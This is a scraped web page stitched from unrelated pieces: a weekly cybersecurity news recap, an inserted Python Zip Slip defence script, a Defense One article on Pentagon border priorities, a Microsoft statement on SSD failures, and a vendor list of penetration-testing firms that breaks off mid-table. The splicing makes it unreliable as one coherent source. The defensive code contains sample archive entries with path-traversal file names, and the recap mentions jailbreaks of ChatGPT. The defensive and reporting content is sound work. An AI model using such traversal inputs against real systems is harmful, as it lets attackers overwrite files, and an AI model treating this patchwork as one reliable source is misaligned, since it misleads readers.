A serious security vulnerability in Netskope’s Windows client has been discovered that could allow attackers to escalate privileges from a low-privileged user to full system-level access. The flaw, tracked as CVE-2025-0309, affects all versions of the Netskope Windows client prior to version R129 and has prompted the company to release urgent security updates. Exploiting Rogue […]
Welcome to your Weekly Cybersecurity News Recap. This week, the digital world faced a fresh wave of threats, underscoring the relentless evolution of cyber risks that target individuals and organizations alike.
From our personal communication apps to the browsers we use daily, the attack surface continues to expand, demanding constant vigilance.
A significant vulnerability emerged within WhatsApp, one of the world’s most popular messaging applications. The flaw raised alarms about the potential for breaches of personal conversations and data, affecting millions of users who rely on the platform for secure communication.
This incident serves as a stark reminder that even the most trusted applications are not immune to security gaps, and highlights the critical need for users to stay updated with the latest patches and security advisories.
Meanwhile, Google issued an emergency update for Chrome to patch a zero-day vulnerability that was actively being exploited in the wild. A “zero-day” refers to a flaw that attackers discover before the vendor has become aware of it or has had time to create a patch.
Such exploits are particularly dangerous as they can be used to launch surprise attacks, giving security teams no time to prepare. The swift response from Google emphasized the ongoing cat-and-mouse game between tech giants and malicious actors.
In a more forward-looking but equally concerning development, the use of artificial intelligence in ransomware attacks has become a prominent topic.
Cybercriminals are now leveraging AI to create more sophisticated and evasive malware, capable of learning from its environment, identifying valuable targets, and adapting its attack vectors to bypass security measures. This marks a significant leap in the capabilities of ransomware, posing a formidable challenge to conventional defense mechanisms.
Rounding out the week, a series of cyber attacks targeted various sectors, from healthcare to finance, demonstrating the diverse motivations and methods of threat actors.
These incidents ranged from data breaches aiming to steal sensitive information to disruptive attacks designed to cripple critical infrastructure.
As we dissect these events, it’s clear that a proactive and intelligence-led approach to cybersecurity has never been more crucial. Stay with us as we delve deeper into these stories and what they mean for your digital security.
Cyber Attack
New RDP Vulnerability Exposes Windows Systems to Remote Code Execution
A critical vulnerability has been discovered in Microsoft’s Remote Desktop Protocol (RDP), which could allow attackers to execute remote code on affected Windows systems. The flaw resides in the way RDP handles certain requests, and if exploited, could give an attacker complete control over the targeted machine. Microsoft has released a patch and urges all users to update their systems immediately to mitigate the risk. This vulnerability is particularly concerning given the widespread use of RDP for remote administration and work-from-home scenarios.
Weaponized AI-Generated Summaries Used in Sophisticated Phishing Attacks
Security researchers have identified a new phishing technique where attackers are using AI to generate convincing summaries of legitimate articles and documents. These summaries are then embedded in emails with malicious links. The high quality and relevance of the AI-generated content make it difficult for users to distinguish these emails from genuine communications, leading to a higher success rate for the attackers. This method represents a significant evolution in phishing tactics, leveraging advanced technology to create more believable and dangerous lures.
North Korean Hackers “Kimsuky” Leak Stolen Data
The North Korean advanced persistent threat (APT) group known as Kimsuky has reportedly leaked a large cache of data stolen from various targets. The group is known for its cyber-espionage campaigns, and this data leak is believed to be a tactic to intimidate and pressure its victims. The leaked information includes sensitive government and corporate documents. This incident highlights the ongoing threat posed by state-sponsored hacking groups and their evolving strategies.
Malicious Bing Ads Deploy Weaponized PuTTY
Attackers are using malicious advertisements on Microsoft’s Bing search engine to distribute a weaponized version of the popular SSH and Telnet client, PuTTY. When users search for “PuTTY” on Bing, these malicious ads appear at the top of the search results, directing them to a fake website that looks identical to the official PuTTY download page. The downloaded file is a trojanized version of the application that, once installed, gives attackers backdoor access to the victim’s system.
Microsoft Exposes “Storm-0501”: A New Financially Motivated Cybercrime Group
Microsoft has published details on a newly identified cybercrime group it tracks as “Storm-0501.” This group is described as financially motivated and has been observed using a variety of sophisticated techniques to compromise corporate networks for financial gain. Their tactics include deploying ransomware, stealing sensitive financial data, and engaging in business email compromise (BEC) scams. Microsoft’s report aims to help organizations defend against this emerging threat.
Microsoft Teams Exploited for Remote Access by Attackers
Cybercriminals are increasingly exploiting Microsoft Teams as a vector for gaining initial access to corporate networks. Attackers are using social engineering tactics to trick employees into granting them access through Teams meetings or by sharing malicious files via the platform. Once inside, they can move laterally within the network, escalate privileges, and exfiltrate data. The growing reliance on collaboration tools like Teams has made them a prime target for attackers.
Threats
New Android Spyware “SoumniBot” Disguised as Antivirus App
A new Android spyware, named “SoumniBot,” is being distributed disguised as a legitimate antivirus application. This malware uses sophisticated techniques to evade detection and steal sensitive user data. Once installed, it can gain extensive permissions, allowing it to access contacts, messages, and financial information. Users are advised to only download applications from official app stores and to be cautious of apps requesting excessive permissions.
Chinese Hacking Group UNC6384 Exploits F5 BIG-IP Vulnerability
The China-based hacking group UNC6384 has been identified exploiting a critical vulnerability in F5 BIG-IP networking devices. This allows them to gain initial access to target networks, deploying malware to exfiltrate data and establish long-term persistence. The group has been linked to attacks on various sectors, including government, technology, and telecommunications. Organizations using F5 BIG-IP are urged to apply the latest security patches immediately.
Mustang Panda APT Group Evolves Tactics to Target Governments
The China-based threat actor known as Mustang Panda (or TAG-87) continues to evolve its tactics to target government and public sector entities globally. The group is known for using spear-phishing campaigns with lures related to geopolitical events. They employ custom malware and living-off-the-land techniques to remain undetected while exfiltrating sensitive political and economic information.
TAG-144 Actors Target Government and Defense Industries in Latin America
A sophisticated threat actor, tracked as TAG-144, has been launching cyberattacks against government, defense, and transportation entities in Latin America. The group uses highly targeted spear-phishing emails containing malicious attachments to compromise their victims. Their primary motive appears to be cyberespionage, focusing on stealing confidential documents and credentials from high-value targets.
Popular Nx Build Tool Compromised in Supply Chain Attack
The widely used open-source build tool, Nx, has been the target of a supply chain attack. Malicious code was injected into one of its dependencies, potentially affecting thousands of developers and projects that use the tool. The attack aimed to steal secrets and environment variables from developers’ machines. Users of Nx are advised to update to the latest patched version and audit their systems for any signs of compromise.
“Sindoor” Dropper Targets Linux Systems with Multiple Malware Payloads
A new malware dropper, dubbed “Sindoor,” has been discovered targeting Linux-based systems. This dropper is capable of deploying multiple malicious payloads, including cryptocurrency miners and remote access trojans (RATs). It gains access through vulnerable services and weak credentials, highlighting the need for robust security practices on Linux servers, which are often considered more secure.
Vulnerabilities
PoC Released for Chrome 0-Day Vulnerability (CVE-2024-5274)
A proof-of-concept exploit has been released for a high-severity zero-day vulnerability in Google Chrome’s V8 JavaScript engine. Tracked as CVE-2024-5274, this type confusion bug was actively exploited in the wild before Google released a patch. The availability of a PoC exploit increases the risk of further attacks, and users are urged to update their Chrome browsers to the latest version.
Another vulnerability has been discovered in Google Chrome, this time a use-after-free flaw in the browser’s accessibility features. This vulnerability could allow a remote attacker to execute arbitrary code on a targeted system. The flaw is triggered when a user visits a malicious website. Google has addressed this issue in a recent Chrome update.
New Zip Slip Vulnerability Allows Attackers to Overwrite Files
A new “Zip Slip” vulnerability has been discovered that could allow attackers to overwrite arbitrary files on a victim’s system. This type of vulnerability occurs when a specially crafted archive file is extracted. The flaw exists in how some libraries handle file paths, allowing a file within the archive to be written to a location outside of the intended extraction directory.
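The path check that closes the Zip Slip gap described above, as an added example in Python that is not code from the original article or from any library it names: every archive entry is resolved against the extraction directory and the whole archive is refused if any entry would land outside it, with a separate audit helper for scanning an archive before extracting. The archives, entry names and helper names (resolve_safe_target, find_unsafe_entries, extract_zip_safely) are constructed for illustration.

```python
"""Zip Slip defence: validate archive entry paths before writing them to disk.

Added example (not code from the original article or from any library it
names). Archive contents, entry names and helper names are constructed for
illustration.
"""
from __future__ import annotations

import io
import tempfile
import zipfile
from pathlib import Path
from typing import Optional


class ZipSlipError(ValueError):
    """Raised when an archive entry would be written outside the extraction directory."""


def resolve_safe_target(dest_dir: Path, member_name: str) -> Path:
    """Return the absolute path an entry would land on, or raise ZipSlipError.

    Both sides are fully resolved, so '../' sequences, absolute paths and
    backslash-separated names (honoured by some extractors on any OS) are all
    caught by one containment test: the target must be dest_dir or lie under it.
    """
    dest = dest_dir.resolve()
    target = (dest / member_name.replace("\\", "/")).resolve()
    if target != dest and dest not in target.parents:
        raise ZipSlipError(f"entry {member_name!r} escapes {dest}")
    return target


def find_unsafe_entries(archive_bytes: bytes, dest_dir: Path = Path("extract")) -> list[str]:
    """Audit an archive without extracting it: names that would escape dest_dir."""
    unsafe: list[str] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            try:
                resolve_safe_target(dest_dir, name)
            except ZipSlipError:
                unsafe.append(name)
    return unsafe


def extract_zip_safely(archive_bytes: bytes, dest_dir: Path) -> list[Path]:
    """Extract an in-memory zip into dest_dir, refusing the whole archive on traversal.

    Every entry is validated before the first byte is written, so a hostile
    archive cannot leave a half-extracted tree behind.
    """
    written: list[Path] = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        plan = [(info, resolve_safe_target(dest_dir, info.filename)) for info in zf.infolist()]
        for info, target in plan:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def build_archive(entries: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from name -> content (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)  # writestr stores the name verbatim, traversal and all
    return buf.getvalue()


# Constructed sample archives: one with three escape patterns, one that is clean.
MALICIOUS_ARCHIVE = build_archive({
    "docs/readme.txt": b"harmless",
    "../../outside.txt": b"escapes via parent references",
    "/tmp/absolute.txt": b"escapes via an absolute path",
    "..\\backslash.txt": b"escapes via a Windows-style separator",
})
CLEAN_ARCHIVE = build_archive({
    "a.txt": b"a",
    "sub/b.txt": b"b",
    "sub/../c.txt": b"c",  # stays inside after normalisation, so it is allowed
})


def extract_to_temp(archive_bytes: bytes) -> tuple[list[str], Optional[str]]:
    """Extract into a fresh temporary directory; return (paths written, error message)."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp).resolve()
        try:
            written = extract_zip_safely(archive_bytes, dest)
        except ZipSlipError as exc:
            return [], str(exc)
        return sorted(p.relative_to(dest).as_posix() for p in written), None


if __name__ == "__main__":
    print("unsafe entries:", find_unsafe_entries(MALICIOUS_ARCHIVE))
    print("clean archive:", extract_to_temp(CLEAN_ARCHIVE))
    print("malicious archive:", extract_to_temp(MALICIOUS_ARCHIVE))
```

Python's own ZipFile.extract silently strips leading parent references and absolute prefixes from entry names, so this explicit check matters most in code that opens entries and writes them itself (streaming extractors, tar handling, libraries in other languages that do no sanitisation), and where a traversal entry should cause the archive to be rejected and logged rather than quietly rewritten.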
CISA Releases New ICS Advisories
The Cybersecurity and Infrastructure Security Agency (CISA) has released 12 new advisories concerning Industrial Control Systems (ICS). These advisories highlight vulnerabilities in products from various vendors and provide mitigation recommendations. The products affected are used in critical infrastructure sectors, making these updates essential for operators to review and implement.
FreePBX Servers Hacked in 0-Day Attack
A critical zero-day vulnerability in the popular open-source FreePBX phone system is being actively exploited by hackers. The attacks are reportedly creating unauthorized administrator accounts on the compromised systems, giving attackers full control. Sangoma, the company behind FreePBX, has released a security advisory and patches to address the vulnerability.
Vulnerability in Cisco Nexus 3000 and 9000 Series Switches
A high-severity vulnerability has been found in Cisco’s Nexus 3000 and 9000 Series switches. This flaw could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device. The vulnerability is in the NX-API feature and can be exploited by sending a crafted HTTP request. Cisco has released software updates to address this issue.
WhatsApp 0-Day Vulnerability Could Lead to App Takeover
A zero-day vulnerability was discovered in WhatsApp that could allow an attacker to take over a user’s app. The attack can be carried out by sending a specially crafted video file to the victim. Once the user plays the video, the attacker can gain control of the WhatsApp account. Users are advised to update their app to the latest version to protect themselves.
AI Attacks
Researchers Discover Name-Triggered Jailbreaks in OpenAI’s ChatGPT
Security researchers have found a new method to bypass the safety protocols of OpenAI’s ChatGPT. By using a specific, seemingly innocuous name as a trigger, they can “jailbreak” the AI, causing it to respond to malicious prompts that it would typically block. This discovery highlights the ongoing challenge of securing large language models from adversarial attacks.
Vulnerability Found in Google’s Gemini CLI for Image Scaling
A critical vulnerability has been identified in the command-line interface (CLI) for Google’s Gemini AI. The flaw, related to image scaling, could potentially be exploited by attackers to execute arbitrary code. Users of the tool are urged to apply patches immediately to mitigate the risk.
The First AI-Powered Ransomware Emerges
Cybersecurity analysts are warning about the development of the first ransomware variants that leverage artificial intelligence to execute more sophisticated and evasive attacks. This new strain of malware can autonomously identify high-value targets, adapt its attack vectors, and create unique phishing lures, posing a significant new threat to organizations.
Data Breach
French Retail Giant Auchan Hit by Cyberattack
Auchan, one of France’s largest retail chains, has disclosed that it recently suffered a significant cyberattack. The company is currently investigating the extent of the breach and has not yet confirmed what data, if any, was compromised. The incident has caused disruptions to some of its services, and recovery efforts are underway.
TransUnion Investigates Major Data Hack
Credit reporting agency TransUnion is investigating a potential data breach that may have exposed sensitive customer information. The company has acknowledged the incident and is working with law enforcement and cybersecurity experts to understand the scope of the hack. This event raises fresh concerns about the security of personal financial data held by credit bureaus.
Customer Authentication Tokens Exposed at Salesloft and Drift
A security incident has led to the exposure of customer authentication tokens for users of Salesloft and Drift, two popular sales and marketing platforms. The exposed tokens could allow unauthorized access to customer accounts. Both companies have initiated a response, which includes rotating the exposed credentials and notifying affected customers.
Other News
Google to Implement New Developer Verification Layer
In an effort to enhance security across its ecosystem, Google has announced it will be adding a new layer of verification for developers. This measure aims to prevent malicious actors from publishing harmful apps and software, providing users with greater confidence in the tools they download and use.
Microsoft Releases New Tool for VMware Migration
Microsoft has launched a new tool designed to help organizations migrate their virtual machines from VMware to its own platform. The tool includes several security features to ensure a safe transition, but experts advise IT teams to follow best practices carefully to avoid potential vulnerabilities during the migration process.
Security Risk Identified in Teams-Embedded Office Documents
A new security vulnerability has been found in how Microsoft Teams handles embedded Office documents. The flaw could allow an attacker to bypass security warnings and deliver malware to unsuspecting users through a trusted channel. Microsoft is expected to release a patch to address the issue soon.
Defending the homeland, not deterring China, tops the list of priorities that Defense Secretary Pete Hegseth sent to senior Pentagon leaders and combatant commanders earlier this month, ahead of the expected release of the second Trump administration’s first National Defense Strategy.
This focus reflects “the President’s determination to restore our neglected position in the Western Hemisphere,” Hegseth wrote in an Aug. 7 memo laying out his defense-planning guidance. Defense One obtained a copy of the memo.
Before mentioning China—long seen as the “pacing challenge” with which the U.S. is jockeying for influence in not only the Indo-Pacific, but Africa and Latin America—the guidance’s first listed priority is to “seal our borders, repel invasion, counter narcotics and trafficking, and support the Department of Homeland Security mission to deport illegal aliens.”
The language continues the current Trump administration’s departure from not just the Biden National Defense Strategy, but the president’s own first-term strategy, both of which placed deterring China as first priority.
It’s a shift in rhetoric that has borne out in action, as Trump has ordered the militarization of the southern border while deploying Marines and National Guardsmen to Los Angeles—illegally, according to the state’s governor—to dispel protests of Immigration and Customs Enforcement raids.
It may be the best option in the short term, in the face of poorly resourced law-enforcement agencies, but it’s not what the Defense Department is designed to do, Glen VanHerck, a retired Air Force general and former head of U.S. Northern Command, told Defense One.
“I think ultimately, if our government had another option—such as with ICE and Customs and Border Protection, with more capacity, capability—that they would utilize it. They just don't have it,” VanHerck told Defense One.
DHS has requested DOD support at the border every year since 2018. Though the number of requested troops dropped during the Biden administration from a high of 5,500 troops to 2,500 before Trump took office in January, the agency made the case every year that CBP was incapable of securing the border alone.
CBP has taken strides to fill its persistent staffing shortages, mainly by offering recruiting bonuses and streamlining the hiring process. But that takes time.
“And so if you're the president, you've got four years, you're not going to wait and build the capacity and capability within DHS or other agencies beyond DOD in that time, to execute what you need,” VanHerck said.
But supporting law enforcement shouldn’t be a core mission for the military, VanHerck said, echoing public statements he made during his tenure at NORTHCOM.
“I am concerned that DOD has become the ‘easy button’ for everything. So it doesn't matter if it's a Biden administration or a Trump administration—‘when you need capacity and capability, call on DOD’,” he said. “That, long-term, is not good for our nation, to have DOD in our streets. We need to resource those agencies, spelled out in law to enforce our laws, and to conduct crisis response, in our homeland.”
Asked for comment on the defense secretary’s planning guidance, Pentagon spokesman Joel Valdez referred questions to the White House.
None of Hegseth’s written documents or public statements suggest this is a short-term project. In April, the U.S. established a militarized zone across the border that allows troops to detain trespassers, a mission previously reserved to law-enforcement agencies. This month he created a new medal to be awarded to troops who serve at least 30 days on the border mission.
“In the meantime, when you're using DOD, what are you doing at DHS and DOJ to develop more capacity, more capability, to utilize technology better—not just the human—so the DOD doesn't have to do this long-term?” VanHerck said.
Beyond the border
Meanwhile, more than a dozen states are activating National Guard troops locally to help ICE, not only by processing paperwork and handling other administrative tasks, but by driving agents around.
“The story is, why haven’t we resourced law-enforcement agencies to enforce our laws that Congress puts on the books?” VanHerck said.
DHS’s 2026 budget request cuts $81 million from CBP’s 2025 levels while adding more than $800 million to ICE. They both benefit from $165 billion infused into DHS through the reconciliation bill, which includes funding for recruitment.
“We need a whole-nation strategy, led by DHS, that leads to lines of effort by department, that leads to funding for each of those lines of effort, that leads to training for those lines of effort,” VanHerck said.
That could include the newly codified counter-narcotics priority, which DOD has intermittently supported in the past and has continued into this year; so far that support has included surveillance flights and ships deployed off the coast of Central America.
“One of the challenges is that Mexico does not have the ability to conduct high-fidelity surveillance like we can,” VanHerck said. “We can help point them in the right direction if we’re willing to share information.”
But the administration has also been considering drone strikes against cartels operating in Mexico, though that country’s president has said, “The United States is not going to come to Mexico with the military.”
There are options aside from deploying troops into the country, VanHerck said.
“One of the things I advocated for, for a long time: help Mexico identify precursor materials coming in so they can seize them at their ports, those types of things,” he said.
And then there is the deployment of troops to major U.S. cities: Los Angeles; Washington, D.C.; and possibly Chicago and Baltimore.
While deploying the Guard to enforce local laws isn’t an explicit part of any national-security strategy yet, it’s becoming a go-to move.
“As you all know, Chicago’s a killing field right now,” Trump told reporters in the Oval Office on Monday. (Hundreds have been killed in the past year, but the city’s murder rate is at a decade low.) He later added that he isn’t keen to “barge in on a city and then be treated horribly by corrupt politicians,” following reports the Pentagon had been working on Chicago deployment plans for weeks.
As these aren’t long-planned operations, it’s unclear what kind of readiness or financial impact they will have on the units themselves.
“Is the money going to prevent some units from drilling? I don't think anybody knows that at this particular point in time,” said John Goheen, spokesman for the National Guard Association of the United States. “The numbers would suggest no, but this is something the Pentagon is going to have to answer.”
The Guard’s primary mission is to train for war, Goheen said, with disaster relief a common additional mission.
They aren’t resourced to be continuously supporting law enforcement, said Gordon Adams, a professor emeritus in international affairs at American University’s School of International Service.
“From a budgetary perspective, it means that the domestic use of forces is not necessarily planned or budgeted,” Adams said. “If the special intervention units of the National Guard are actually created at DOD, at some point they will likely budget for them. But at present, the regime’s practice seems to be—‘act first, find the money later’.”
While Guard budgets are flexible enough to cover pay and travel costs of unplanned deployments, they are not funded to the level of an ongoing national-security priority. DOD also has small pots of money to support DHS’s border mission and the counter-trafficking mission.
The problem is, DOD’s current budget does not have enough money for a surge in these missions, which are now treated as a cornerstone of Hegseth’s strategy. The 2026 budget puts some money toward them, but every year it is an open question whether, and when, a proper budget will be signed at all, much less on time.
“If it's something that you're going to prioritize and it's not a contingency, or it's not emergent, it's going to be in the budget,” said Elaine McCusker, a senior fellow at the American Enterprise Institute and former Pentagon comptroller during Trump’s first administration.
In general, unplanned deployments like the border plus-up earlier this year or the current Guard deployment to D.C. can be covered by operations and maintenance funding.
“And that's pretty typical for any kind of unexpected operation that the department does, and the impacts also range based on the size, right?” McCusker said. “What were you planning on doing with that money that you're not able to do now? And how do you go about making that up?”
A prime example, during McCusker’s tenure at the Pentagon, was the reprogramming of billions in military construction funding to build the border fence, which pushed back planned projects including weapons ranges and training facilities.
“Every time a new mission is assigned to the Defense Department, it must manage, plan, execute, assess, and report on the activity,” McCusker wrote in an essay for Lawfare last year. “This draws personnel, management focus, and resources away from what should be the defense core mission: preparing for, fighting, and winning America’s wars.”
The reconciliation bill has some funding to cover these missions, she told Defense One, though the vast majority of it goes to DHS. DOD has $1 billion to spend over the next four years.
It’s not clear what homeland defense as the No. 1 DOD priority will look like in the 2026 budget.
“I think that that's going to, in part, depend on what the top line is, and if you have to actually divert resources from a second or third priority into a first priority, or if you have kind of an ongoing effort that you augment, based on what the requirement is,” McCusker said.
Microsoft has officially addressed growing concerns among Windows 11 users, stating that its August 2025 security update for version 24H2 is not responsible for the scattered reports of SSD and HDD failures that have recently surfaced on social media and tech forums.
The announcement follows a period of user concern after several individuals reported hardware issues shortly after installing the latest patch.
The wave of concern began earlier this month when users started posting about unexpected drive malfunctions, system instability, and data access problems.
Many people shared stories online about problems they faced, leading to concerns that the required August security update might be the cause. The timing of these issues worried many users about potential harm to their storage drives and the risk of losing data permanently.
In response to the escalating situation, Microsoft launched an internal review to determine the validity of these claims. After completing its analysis, the company issued a definitive statement on its Windows release health dashboard.
“After thorough investigation, Microsoft has found no connection between the August 2025 Windows security update and the types of hard drive failures reported on social media,” the company stated.
Microsoft further reassured its customers that its monitoring processes remain active post-update releases. “As always, we continue to monitor feedback after the release of every Windows update, and will investigate any future reports,” the statement continued.
This confirms that, although the initial investigation is closed, the company continues to track user-submitted data for any new or emerging issues.
Despite Microsoft’s clear-cut denial, a sense of caution lingers within the community. While the reports appear to affect only a small number of users, the severity of potential hardware failure has led some tech analysts and users to advise a wait-and-see approach.
For those concerned about the potential risk to their systems, pausing the update for a short period until more user data becomes available is a recommended course of action.
This incident highlights the complex nature of software updates in a diverse hardware ecosystem. Often, issues that appear to be caused by a software patch are later found to be coincidental hardware failures or conflicts with third-party drivers.
As a standard best practice, all users are encouraged to perform a full backup of their critical data before installing any major operating system updates. While Microsoft has found no evidence of a link, regular backups remain the most effective safeguard against data loss from any unforeseen event.
Web application penetration testing in 2025 goes beyond a simple, one-time assessment. The top companies combine human expertise with automation and intelligent platforms to provide continuous, on-demand testing.
The rise of Penetration Testing as a Service (PTaaS) and bug bounty programs reflects this evolution, offering flexible, scalable, and real-time security testing that keeps pace with agile development cycles.
Why We Choose It
The dynamic nature of web applications, with frequent updates and a growing reliance on APIs and cloud-native services, creates a continuously shifting attack surface.
Traditional, point-in-time penetration tests are no longer sufficient.
The top companies on this list have distinguished themselves by providing a blend of deep, manual testing by highly skilled professionals and platform-driven automation to ensure comprehensive, continuous coverage.
They offer not just findings, but clear, actionable remediation guidance and seamless collaboration.
How We Choose Web Application Penetration Testing Companies
Our selection of the best web application penetration testing companies is based on three key criteria:
Experience & Expertise (E-E): We evaluated each company’s track record, the qualifications of their testers, and their specialization in finding complex business logic flaws that automated scanners miss.
Authoritativeness & Trustworthiness (A-T): We considered market recognition, customer reviews, and their adherence to industry standards like CREST and the OWASP Testing Guide.
Feature-Richness: We assessed the comprehensiveness of their offerings, focusing on the ability to provide a platform for continuous testing, real-time reporting, and seamless integration with development workflows.
Web Application Penetration Testing Companies Comparison (2025)
NetSPI is a leader in penetration testing, known for its expertise and its Penetration Testing as a Service (PTaaS) platform.
The platform provides a single interface for scoping, real-time collaboration with testers, and viewing high-fidelity findings for web applications.
NetSPI’s team of over 300 in-house experts conducts deep, manual web application testing, focusing on complex business logic flaws and multi-step vulnerabilities.
Their platform streamlines the entire testing lifecycle, from discovery to remediation.
Why You Want to Buy It:
NetSPI combines human expertise with a powerful, purpose-built platform. This allows for continuous, on-demand testing with real-time reporting and integrations that accelerate the remediation process.
Feature | Yes/No | Specification
PTaaS Platform | Yes | Provides a platform for scoping and real-time findings.
The platform integrates with Jira, ServiceNow, and other tools.
Best For: Enterprise organizations that need a highly experienced team of testers and a technology platform to manage their security testing program at scale.
Cobalt.io pioneered the PTaaS model by connecting companies with a vetted community of expert security researchers. The Cobalt platform simplifies the entire process, from test setup to report delivery.
Clients can launch a web application penetration test in as little as 24 hours, collaborating directly with testers in real time.
This agile approach is ideal for DevOps teams who need to integrate security testing into their continuous integration and continuous delivery (CI/CD) pipelines.
Why You Want to Buy It:
Cobalt’s on-demand model provides access to a global talent pool of ethical hackers, ensuring you have the right expertise for any type of web application.
The platform’s efficiency and ease of use drastically reduce the time from “find” to “fix.”
Feature | Yes/No | Specification
PTaaS Platform | Yes | On-demand platform for launching and managing tests.
Human-Led Testing | Yes | Access to a vetted community of over 400 pentesters.
Real-Time Collaboration | Yes | Direct communication with testers via the platform.
Integration | Yes | Integrates with Jira, Slack, and other dev tools.
Best For: Fast-moving organizations and modern product teams that need a flexible, scalable, and on-demand penetration testing solution.
Pentera offers an automated security validation platform that simulates real-world attacks to continuously test an organization’s security posture.
While it doesn’t use a human team, its platform is highly effective at acting as a continuous, automated penetration tester for web applications.
The tool discovers vulnerabilities and, uniquely, safely exploits them to provide a clear, objective measure of an organization’s security risk.
Why You Want to Buy It:
Pentera’s automated approach is its key differentiator.
It’s a powerful tool for teams that want to shift from point-in-time testing to continuous security validation, making it easy to see which vulnerabilities truly matter.
Feature | Yes/No | Specification
PTaaS Platform | Yes | Automated, AI-driven platform.
Human-Led Testing | No | Platform-based, automated testing only.
Attack Simulation | Yes | Safely exploits vulnerabilities to prove risk.
Reporting | Yes | Provides detailed reports with remediation guidance.
Best For: Companies that need to continuously and automatically validate their security posture at scale, without the need for manual, time-consuming testing.
Bishop Fox is a world-renowned security consulting firm with a strong reputation for deep, manual penetration testing and red teaming.
Their web application penetration testing services are performed by highly certified experts who go beyond automated tools to find critical, business-logic vulnerabilities.
While they offer a platform for collaboration and reporting, their core strength lies in their expert-led engagements, which are often used to satisfy the most stringent compliance requirements.
Why You Want to Buy It:
Bishop Fox’s reputation and expertise are second to none. If you have a mission-critical web application and need the highest level of assurance, their team of seasoned professionals is an excellent choice.
Feature | Yes/No | Specification
PTaaS Platform | Yes | Offers a platform for engagement management.
Human-Led Testing | Yes | World-class team of highly experienced pentesters.
Compliance Focus | Yes | Specializes in compliance-driven pentests.
Real-Time Reporting | Yes | Provides real-time visibility into findings.
Best For: Large, high-security enterprises that need a boutique, expert-led engagement to test for the most sophisticated and complex vulnerabilities.
SecureWorks offers comprehensive web application penetration testing services that are backed by their global Counter Threat Unit (CTU) research team.
Their approach combines manual testing with intelligence from real-world threats to provide a highly targeted and effective assessment.
The SecureWorks team focuses on replicating the tactics of real adversaries, ensuring that their findings are relevant and actionable.
Why You Want to Buy It:
SecureWorks’ access to real-world threat intelligence and its experienced CTU team provide a unique advantage. They can test for vulnerabilities that are actively being exploited, giving you an edge over attackers.
Feature | Yes/No | Specification
PTaaS Platform | No | Primarily a service-based model.
Human-Led Testing | Yes | Team of experts backed by threat intelligence.
Threat-Based Testing | Yes | Replicates real-world adversary tactics.
Reporting | Yes | Detailed reports with executive summaries.
Best For: Companies that want a penetration test from a large, trusted security provider with deep threat intelligence and a history of responding to real-world incidents.
Synack provides a unique platform that blends a vetted community of ethical hackers (the Synack Red Team) with a proprietary technology platform.
The platform automates reconnaissance and vulnerability discovery, while human researchers focus on the complex, critical vulnerabilities that require human intelligence to uncover.
Synack also offers a bug bounty-style model where organizations pay for validated vulnerabilities, providing a flexible and outcome-based approach to security testing.
Why You Want to Buy It:
Synack’s crowdsourced approach provides a wide range of expertise and a continuous testing model. It’s an excellent way to get broad coverage and find critical vulnerabilities that might be missed by a single team.
Feature | Yes/No | Specification
PTaaS Platform | Yes | Platform for managing and scaling tests.
Human-Led Testing | Yes | Vetted community of ethical hackers.
Bug Bounty Model | Yes | Pay-per-vulnerability model available.
Reporting | Yes | Provides real-time vulnerability reports.
Best For: Organizations that want to scale their security testing program by combining the power of a crowdsourced model with the control and rigor of a traditional pentest.
While best known for its bug bounty platform, HackerOne has also become a major player in web application penetration testing.
Their HackerOne Pentest solution leverages their massive community of vetted ethical hackers to conduct targeted, expert-driven tests.
The platform streamlines the entire engagement, from scoping to remediation, and provides a continuous security model that can be tailored to a company’s specific needs.
Why You Want to Buy It:
HackerOne offers a unique blend of formal penetration testing and the continuous, broad-based coverage of a bug bounty. This provides flexibility and the ability to access a wide range of expertise.
Feature | Yes/No | Specification
PTaaS Platform | Yes | A platform for managing pentests and bug bounties.
Human-Led Testing | Yes | Access to a vast community of ethical hackers.
Bug Bounty Model | Yes | The world’s most popular bug bounty platform.
Integration | Yes | Integrates with Jira, Slack, GitHub, and more.
Best For: Companies that want to leverage the power of a global ethical hacker community for both their bug bounty program and their penetration testing needs.
Appsecco is a specialist in application security, offering deep expertise in web and mobile application penetration testing.
The company prides itself on its close collaboration with development teams, providing clear, actionable recommendations to help them build more secure products.
Their services are designed to be fast, flexible, and reliable, focusing on uncovering business logic vulnerabilities that automated tools often miss.
Why You Want to Buy It:
Appsecco’s emphasis on collaboration and clear, practical advice sets it apart. They act as a trusted security partner, helping teams not only find vulnerabilities but also learn how to prevent them in the future.
Feature | Yes/No | Specification
PTaaS Platform | Yes | Offers a platform for collaboration and reporting.
Human-Led Testing | Yes | Expert-level, manual penetration testing.
Collaboration | Yes | Focuses on working closely with dev teams.
Remediation | Yes | Provides clear, actionable recommendations.
Best For: Development-centric organizations that need a security partner who can work directly with their engineers to fix issues and improve their security posture.
Rhino Security Labs is a well-regarded security firm with a strong reputation for its offensive security research and penetration testing.
Their web application penetration testing services are backed by a team of highly-skilled testers who have a history of discovering and disclosing zero-day vulnerabilities.
They focus on providing a thorough, manual assessment that goes beyond simple scanning to find critical, exploitable flaws.
Why You Want to Buy It:
Rhino’s research-driven approach ensures that their team is always up-to-date on the latest attack techniques. This provides a high-quality, comprehensive assessment that is tailored to modern threats.
Feature | Yes/No | Specification
PTaaS Platform | No | Primarily a service-based model.
Human-Led Testing | Yes | Team of experts with a history of research.
Advanced Techniques | Yes | Focuses on advanced, manual exploitation.
Reporting | Yes | Detailed and actionable reports.
Best For: Companies that want a security firm known for its cutting-edge research and ability to find sophisticated, difficult-to-detect vulnerabilities.
Astra Security offers a comprehensive security solution that includes automated vulnerability scanning and a manual penetration testing service.
Their platform is designed to provide continuous security testing, with a focus on ease of use and a fast turnaround.
They are known for their strong customer support and a “Vulnerability Scanner with a Human Touch” approach, ensuring that all findings are manually verified by a security expert before being reported.
Why You Want to Buy It:
Astra’s combination of an automated scanner with human verification is a great value proposition. It provides the speed of automation with the accuracy of manual testing, making it an excellent choice for teams with limited resources.
Feature | Yes/No | Specification
